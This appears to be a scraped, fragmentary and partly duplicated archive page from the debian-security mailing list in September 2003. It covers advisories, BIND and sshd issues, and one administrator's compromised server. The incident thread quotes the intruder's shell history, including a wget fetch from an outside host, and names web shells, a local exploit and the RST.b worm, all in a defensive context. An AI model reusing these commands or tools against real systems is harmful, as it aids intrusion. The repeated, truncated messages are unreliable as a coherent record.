-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- --
Debian Security Advisory DSA 386-1 [EMAIL PROTECTED]
http://www.debian.org/security/ Matt Zimmerman
September 18th, 2003
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- --
Debian Security Advisory DSA 387-1 [EMAIL PROTECTED]
http://www.debian.org/security/ Matt Zimmerman
September 18th, 2003
Hi,
Markus Schabel wrote:
I've seen some strange things on my (stable with security-updates)
server: the last apt-get update didn't work because gzip segfaultet.
I've copied gzip from another server over the version on this server,
but it also crashed. Interesting was that the executable
Laurent Corbes {Caf'} wrote:
On Wed, 17 Sep 2003 22:29:58 +0200
Markus Schabel [EMAIL PROTECTED] wrote:
I've seen some strange things on my (stable with security-updates)
server: the last apt-get update didn't work because gzip segfaultet.
I've copied gzip from another server over the version on
Ralf Dreibrodt wrote:
Hi,
Markus Schabel wrote:
I've seen some strange things on my (stable with security-updates)
server: the last apt-get update didn't work because gzip segfaultet.
I've copied gzip from another server over the version on this server,
but it also crashed. Interesting was that
Backup /etc and any other data you have, and you can reference your configuration
files later
during your re-install.
At this point, re-installation is a must. Never delude yourself into thinking you can
'recover'
from being rooted. Sure, you might be able to do so after a lot of effort/etc,
In all fairness, if this issue is in regards to the Verisign cluster
fsck I don't think this has any place in Sendmail personally but rather
in getting Verisign to un-fsck the problem and/or fix DNS servers not to
respond in that manner as to allow that to happen...
Regards,
Don't forget to try to find the potential hole first!
Otherwise you could have a fast recurrence.
Christian
- Original Message -
From: Josh Carroll [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Thursday, September 18, 2003 9:12 AM
Subject: Re: Strange segmentation faults and Zombies
On Wednesday 17 September 2003 17:26, Ilkka Tuohela wrote:
ke, 2003-09-17 kello 18:12, James Miller kirjoitti:
Will the package maintainers of BIND be integrating the patches from
ISC-BIND to negate Verisign's recent shenanigans?
Well, it's not only a patch, it's part of bind upstream
-BEGIN PGP SIGNED MESSAGE-
Adrian von Bidder [EMAIL PROTECTED] [2003-09-18 10:48]:
On Wednesday 17 September 2003 17:26, Ilkka Tuohela wrote:
ke, 2003-09-17 kello 18:12, James Miller kirjoitti:
Will the package maintainers of BIND be integrating the patches from
ISC-BIND to
On Thursday 18 September 2003 10:45, Adrian von Bidder wrote:
rndc stops working for me. Anybody else seen this?
[EMAIL PROTECTED]:/etc/bind# /etc/init.d/bind9 reload
rndc: connect failed: connection refused
(yes, yes, replying to meself...)
Ok: reason: named now runs as root instead of
On Thursday 18 September 2003 11:01, Lukas Ruf wrote:
Adrian von Bidder [EMAIL PROTECTED] [2003-09-18 10:48]:
rndc stops working for me. Anybody else seen this?
have you checked the documentation that comes along with the update?
[EMAIL PROTECTED]:/etc/bind# /etc/init.d/bind9 reload
On Thu, 18 Sep 2003, Christian Storch wrote:
Don't forget to try to find the potential hole first!
Otherwise you could have a fast recurrence.
[..]
in /etc/.rpn theres a .bash_history with the following content:
id
mkdir /etc/.rpn
ps -aux
ps -aux | grep tbk
kill -15292 pid
-BEGIN PGP SIGNED MESSAGE-
Adrian von Bidder [EMAIL PROTECTED] [2003-09-18 11:21]:
On Thursday 18 September 2003 11:01, Lukas Ruf wrote:
Adrian von Bidder [EMAIL PROTECTED] [2003-09-18 10:48]:
rndc stops working for me. Anybody else seen this?
have you checked the documentation
maximilian attems wrote:
On Thu, 18 Sep 2003, Christian Storch wrote:
Don't forget to try to find the potential hole first!
Otherwise you could have a fast recurrence.
[..]
in /etc/.rpn theres a .bash_history with the following content:
id
mkdir /etc/.rpn
ps -aux
ps -aux | grep tbk
kill -15292
Hi list,
I ran an update of ssh to 3.6.1p2-8 due to the recent errors in OpenSSH
on a system with remote access only.
Afterwards I noticed, that the Version which sshd reports was still
the old one. /etc/init.d/ssh restart seemed to have no effect.
Presumably caused by my ssh connection, which
On Thu, Sep 18, 2003 at 09:03:12AM +0200, Markus Schabel wrote:
wget www.slacks.hpg.com.br/bin/dos
That directory www.slacks.hpg.com.br/bin/ also contains some
'interesting' files :-) Some exploits, rootkits etc.
Jan
signature.asc
Description: Digital signature
hi!
* Philipp Hartmann [EMAIL PROTECTED] [2003-09-18 12:35]:
Afterwards I noticed, that the Version which sshd reports was still
the old one. /etc/init.d/ssh restart seemed to have no effect.
Presumably caused by my ssh connection, which was ((and had to be) still
established. The top
In article [EMAIL PROTECTED] you wrote:
Does anyone know a more comfortable way to replace a sshd on a remote
administrated box?
If I kill the top level istening sshd (you can extract its pid by running
netstat -tpln | grep :22 as root) my ssh session is not dropped, and I can
restart a new
The problem is starting before
id
mkdir /etc/.rpn
...
you should think about all what's listening on a port:
- an outdated sshd? (!)
- security updates all up to date?
- known unclosed security hole?
- some nice scripts like 'rootshell.php'? ;)
- perl without tainting checks in cgi-bin?
etc.
Hi again,
On Thu, 2003-09-18 at 12:32, Philipp Hartmann wrote:
Afterwards I noticed, that the Version which sshd reports was still
the old one. /etc/init.d/ssh restart seemed to have no effect.
Presumably caused by my ssh connection, which was ((and had to be) still
established. The top
On Thu, 18 Sep 2003 at 09:08:28AM +0200, Markus Schabel wrote:
scp goodserver:/bin/gzip /bin/gzip
NO! Since there's the chance that the server got hacked I'm not
interested to give him other passwords. copied from the other server
via scp.
scp from the clean system into the dirty one. This
Phillip Hofmeister wrote:
On Thu, 18 Sep 2003 at 09:08:28AM +0200, Markus Schabel wrote:
scp goodserver:/bin/gzip /bin/gzip
NO! Since there's the chance that the server got hacked I'm not
interested to give him other passwords. copied from the other server
via scp.
scp from the clean system
Christian Storch wrote:
The problem is starting before
I think all the things before phpshell.php are done via
phpshell.php and the things you can see in the .bash_history
are only the things after he already got in.
id
mkdir /etc/.rpn
...
you should think about all what's listening on a port:
-
On 18 Sep 2003 at 15:02, Markus Schabel wrote:
Christian Storch wrote:
The problem is starting before
I think all the things before phpshell.php are done via
phpshell.php and the things you can see in the .bash_history
are only the things after he already got in.
[...]
- known
On Thu, Sep 18, 2003 at 09:03:12AM +0200, Markus Schabel wrote:
in the directory /var/www/cncmap/www/upload/renegade there are the
following files: backhole.pl
e.c (Copyright (c) 2003 DTORS Security, ANGELO ROSIELLO 18/02/2003,
LES-EXPLOIT for Linux x86)
rem.php (phpRemoteView)
so we got
On Thu, Sep 18, 2003 at 03:02:04PM +0200, Markus Schabel wrote:
Christian Storch wrote:
- security updates all up to date?
the same state as DSA announcements
Including your kernel?
- known unclosed security hole?
It seems that it was possible to upload execute .php-files somewhere
- perl without tainting checks in cgi-bin?
what exactly do you mean? how can i do/check that?
use '#!/usr/local/bin/perl -T' at the beginning of a perl cgi.
Probably it would end in some 'tainted' errors you have to solve.
For further details look into 'man perlsec'.
Christian
--
To
hi,
I want to setup postfix with SSL.
On the Inet I found only tutorials with postfix v2.0
Stable use postfix v1.1 and I couldn't find any information about posfix
1.1 and SSL
thx for help
Konstantin
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble?
El Miércoles, 17 de Septiembre de 2003 21:29, Markus Schabel escribió:
Hello!
I've seen some strange things on my (stable with security-updates)
server: the last apt-get update didn't work because gzip segfaultet.
I've copied gzip from another server over the version on this server,
but it
On Wed, Sep 17, 2003 at 11:52:36PM +0200, Laurent Corbes {Caf'} wrote:
i'm thinking about a hardware problem.
may the harddrive is in failure (get the ouput of dmesg) or a very big
ram problem that corrupt files on the hard drive.
By the sound of things, this is starting to sound more like
Diego Brouard schreibt:
As you've seen you have been cracked by a worm, it's called
RST.b.
In few words, it infect exectable files in /bin and in the current directory
from where you are executing an already infected binary. You were infected
because of a php bug and the ptrace bug.
Might be a
On Thu, Sep 18, 2003 at 07:02:06PM +0200, Michel Messerschmidt wrote:
Might be a side effect of the tools that were used.
A quick scan with f-prot shows several infected files on the server
www.slacks.hpg.ig.com.br:
()
www.slacks.hpg.ig.com.br/bin/rh Infection: Unix/Osf.A
This is an
In article [EMAIL PROTECTED] you wrote:
I found the problem: The file /var/run/sshd.pid was missing.
Well, this raises the question, since failed restarts of daemons are quite
common because there are simply too much errors which can happen, if we
should add kind of post-update stale-executable
On Thu, Sep 18, 2003 at 09:12:45PM +0200, Bernd Eckenfels wrote:
In article [EMAIL PROTECTED] you wrote:
I found the problem: The file /var/run/sshd.pid was missing.
Well, this raises the question, since failed restarts of daemons are quite
common because there are simply too much errors
In article [EMAIL PROTECTED] you wrote:
Ummm... Tiger does have it, it's called 'check_finddeleted'. I wrote it
after reading an excelent article by Brian Hatch on this precise issue.
Just a minor note, i think tiger is getting better and better, i realy start
to love it. Especially since it
rm -rf phpshell.php
^__^
was this the exploited hole ?
I think so. In fact the problem is that it got there...
probably uploaded somehow...
a upload-form, some web-script maybe?
check php permissions i'd say.
where was enr php-file located? do you know?
good luck, Jst.
--
Hi all. I took preventative measures to protect my exploitable sendmail
until I could get the new package installed on my mail server (running
Debian Stable). I did the usual sudo apt-get update sudo apt-get
upgrade but wasn't seeing the new package.
A little bit of investigation showed the
On Thu, Sep 18, 2003 at 09:12:45PM +0200, Bernd Eckenfels wrote:
In article [EMAIL PROTECTED] you wrote:
I found the problem: The file /var/run/sshd.pid was missing.
Well, this raises the question, since failed restarts of daemons are quite
common because there are simply too much errors
On Thu, Sep 18, 2003 at 10:58:49PM -0400, Robert Brockway wrote:
Was there any particular reason that this newer fixed version has a
version number the makes it look older than the exploitable version?
Simple: it doesn't. The version in stable is 8.12.3-4, and the version on
On Fri, 19 Sep 2003, Matt Zimmerman wrote:
On Thu, Sep 18, 2003 at 10:58:49PM -0400, Robert Brockway wrote:
Was there any particular reason that this newer fixed version has a
version number the makes it look older than the exploitable version?
Simple: it doesn't. The version in stable
Hi,
Markus Schabel wrote:
I've seen some strange things on my (stable with security-updates)
server: the last apt-get update didn't work because gzip segfaultet.
I've copied gzip from another server over the version on this server,
but it also crashed. Interesting was that the executable
Laurent Corbes {Caf'} wrote:
On Wed, 17 Sep 2003 22:29:58 +0200
Markus Schabel [EMAIL PROTECTED] wrote:
I've seen some strange things on my (stable with security-updates)
server: the last apt-get update didn't work because gzip segfaultet.
I've copied gzip from another server over the version
Ralf Dreibrodt wrote:
Hi,
Markus Schabel wrote:
I've seen some strange things on my (stable with security-updates)
server: the last apt-get update didn't work because gzip segfaultet.
I've copied gzip from another server over the version on this server,
but it also crashed. Interesting was
Backup /etc and any other data you have, and you can reference your
configuration files later
during your re-install.
At this point, re-installation is a must. Never delude yourself into thinking
you can 'recover'
from being rooted. Sure, you might be able to do so after a lot of effort/etc,
In all fairness, if this issue is in regards to the Verisign cluster
fsck I don't think this has any place in Sendmail personally but rather
in getting Verisign to un-fsck the problem and/or fix DNS servers not to
respond in that manner as to allow that to happen...
Regards,
Don't forget to try to find the potential hole first!
Otherwise you could have a fast recurrence.
Christian
- Original Message -
From: Josh Carroll [EMAIL PROTECTED]
To: debian-security@lists.debian.org
Sent: Thursday, September 18, 2003 9:12 AM
Subject: Re: Strange segmentation faults
On Wednesday 17 September 2003 17:26, Ilkka Tuohela wrote:
ke, 2003-09-17 kello 18:12, James Miller kirjoitti:
Will the package maintainers of BIND be integrating the patches from
ISC-BIND to negate Verisign's recent shenanigans?
Well, it's not only a patch, it's part of bind upstream
-BEGIN PGP SIGNED MESSAGE-
Adrian von Bidder [EMAIL PROTECTED] [2003-09-18 10:48]:
On Wednesday 17 September 2003 17:26, Ilkka Tuohela wrote:
ke, 2003-09-17 kello 18:12, James Miller kirjoitti:
Will the package maintainers of BIND be integrating the patches from
ISC-BIND to
On Thursday 18 September 2003 10:45, Adrian von Bidder wrote:
rndc stops working for me. Anybody else seen this?
[EMAIL PROTECTED]:/etc/bind# /etc/init.d/bind9 reload
rndc: connect failed: connection refused
(yes, yes, replying to meself...)
Ok: reason: named now runs as root instead of
On Thursday 18 September 2003 11:01, Lukas Ruf wrote:
Adrian von Bidder [EMAIL PROTECTED] [2003-09-18 10:48]:
rndc stops working for me. Anybody else seen this?
have you checked the documentation that comes along with the update?
[EMAIL PROTECTED]:/etc/bind# /etc/init.d/bind9 reload
On Thu, 18 Sep 2003, Christian Storch wrote:
Don't forget to try to find the potential hole first!
Otherwise you could have a fast recurrence.
[..]
in /etc/.rpn theres a .bash_history with the following content:
id
mkdir /etc/.rpn
ps -aux
ps -aux | grep tbk
kill -15292 pid
-BEGIN PGP SIGNED MESSAGE-
Adrian von Bidder [EMAIL PROTECTED] [2003-09-18 11:21]:
On Thursday 18 September 2003 11:01, Lukas Ruf wrote:
Adrian von Bidder [EMAIL PROTECTED] [2003-09-18 10:48]:
rndc stops working for me. Anybody else seen this?
have you checked the documentation
maximilian attems wrote:
On Thu, 18 Sep 2003, Christian Storch wrote:
Don't forget to try to find the potential hole first!
Otherwise you could have a fast recurrence.
[..]
in /etc/.rpn theres a .bash_history with the following content:
id
mkdir /etc/.rpn
ps -aux
ps -aux | grep tbk
kill
Hi list,
I ran an update of ssh to 3.6.1p2-8 due to the recent errors in OpenSSH
on a system with remote access only.
Afterwards I noticed, that the Version which sshd reports was still
the old one. /etc/init.d/ssh restart seemed to have no effect.
Presumably caused by my ssh connection, which
On Thu, Sep 18, 2003 at 09:03:12AM +0200, Markus Schabel wrote:
wget www.slacks.hpg.com.br/bin/dos
That directory www.slacks.hpg.com.br/bin/ also contains some
'interesting' files :-) Some exploits, rootkits etc.
Jan
signature.asc
Description: Digital signature
hi!
* Philipp Hartmann [EMAIL PROTECTED] [2003-09-18 12:35]:
Afterwards I noticed, that the Version which sshd reports was still
the old one. /etc/init.d/ssh restart seemed to have no effect.
Presumably caused by my ssh connection, which was ((and had to be) still
established. The top
In article [EMAIL PROTECTED] you wrote:
Does anyone know a more comfortable way to replace a sshd on a remote
administrated box?
If I kill the top level istening sshd (you can extract its pid by running
netstat -tpln | grep :22 as root) my ssh session is not dropped, and I can
restart a new
The problem is starting before
id
mkdir /etc/.rpn
...
you should think about all what's listening on a port:
- an outdated sshd? (!)
- security updates all up to date?
- known unclosed security hole?
- some nice scripts like 'rootshell.php'? ;)
- perl without tainting checks in cgi-bin?
etc.
Christian Storch wrote:
The problem is starting before
I think all the things before phpshell.php are done via
phpshell.php and the things you can see in the .bash_history
are only the things after he already got in.
id
mkdir /etc/.rpn
...
you should think about all what's listening on a
On 18 Sep 2003 at 15:02, Markus Schabel wrote:
Christian Storch wrote:
The problem is starting before
I think all the things before phpshell.php are done via
phpshell.php and the things you can see in the .bash_history
are only the things after he already got in.
[...]
- known
On Thu, Sep 18, 2003 at 09:03:12AM +0200, Markus Schabel wrote:
in the directory /var/www/cncmap/www/upload/renegade there are the
following files: backhole.pl
e.c (Copyright (c) 2003 DTORS Security, ANGELO ROSIELLO 18/02/2003,
LES-EXPLOIT for Linux x86)
rem.php (phpRemoteView)
so we got
On Thu, Sep 18, 2003 at 03:02:04PM +0200, Markus Schabel wrote:
Christian Storch wrote:
- security updates all up to date?
the same state as DSA announcements
Including your kernel?
- known unclosed security hole?
It seems that it was possible to upload execute .php-files somewhere
- perl without tainting checks in cgi-bin?
what exactly do you mean? how can i do/check that?
use '#!/usr/local/bin/perl -T' at the beginning of a perl cgi.
Probably it would end in some 'tainted' errors you have to solve.
For further details look into 'man perlsec'.
Christian
hi,
I want to setup postfix with SSL.
On the Inet I found only tutorials with postfix v2.0
Stable use postfix v1.1 and I couldn't find any information about posfix
1.1 and SSL
thx for help
Konstantin
El Miércoles, 17 de Septiembre de 2003 21:29, Markus Schabel escribió:
Hello!
I've seen some strange things on my (stable with security-updates)
server: the last apt-get update didn't work because gzip segfaultet.
I've copied gzip from another server over the version on this server,
but it
On Wed, Sep 17, 2003 at 11:52:36PM +0200, Laurent Corbes {Caf'} wrote:
i'm thinking about a hardware problem.
may the harddrive is in failure (get the ouput of dmesg) or a very big
ram problem that corrupt files on the hard drive.
By the sound of things, this is starting to sound more like
Diego Brouard schreibt:
As you've seen you have been cracked by a worm, it's called
RST.b.
In few words, it infect exectable files in /bin and in the current directory
from where you are executing an already infected binary. You were infected
because of a php bug and the ptrace bug.
Might
On Thu, Sep 18, 2003 at 07:02:06PM +0200, Michel Messerschmidt wrote:
Might be a side effect of the tools that were used.
A quick scan with f-prot shows several infected files on the server
www.slacks.hpg.ig.com.br:
()
www.slacks.hpg.ig.com.br/bin/rh Infection: Unix/Osf.A
This is an
In article [EMAIL PROTECTED] you wrote:
I found the problem: The file /var/run/sshd.pid was missing.
Well, this raises the question, since failed restarts of daemons are quite
common because there are simply too much errors which can happen, if we
should add kind of post-update stale-executable
On Thu, Sep 18, 2003 at 09:12:45PM +0200, Bernd Eckenfels wrote:
In article [EMAIL PROTECTED] you wrote:
I found the problem: The file /var/run/sshd.pid was missing.
Well, this raises the question, since failed restarts of daemons are quite
common because there are simply too much errors
In article [EMAIL PROTECTED] you wrote:
Ummm... Tiger does have it, it's called 'check_finddeleted'. I wrote it
after reading an excelent article by Brian Hatch on this precise issue.
Just a minor note, i think tiger is getting better and better, i realy start
to love it. Especially since it
rm -rf phpshell.php
^__^
was this the exploited hole ?
I think so. In fact the problem is that it got there...
probably uploaded somehow...
a upload-form, some web-script maybe?
check php permissions i'd say.
where was enr php-file located? do you know?
good luck,
Hi all. I took preventative measures to protect my exploitable sendmail
until I could get the new package installed on my mail server (running
Debian Stable). I did the usual sudo apt-get update sudo apt-get
upgrade but wasn't seeing the new package.
A little bit of investigation showed the
74 matches
Mail list logo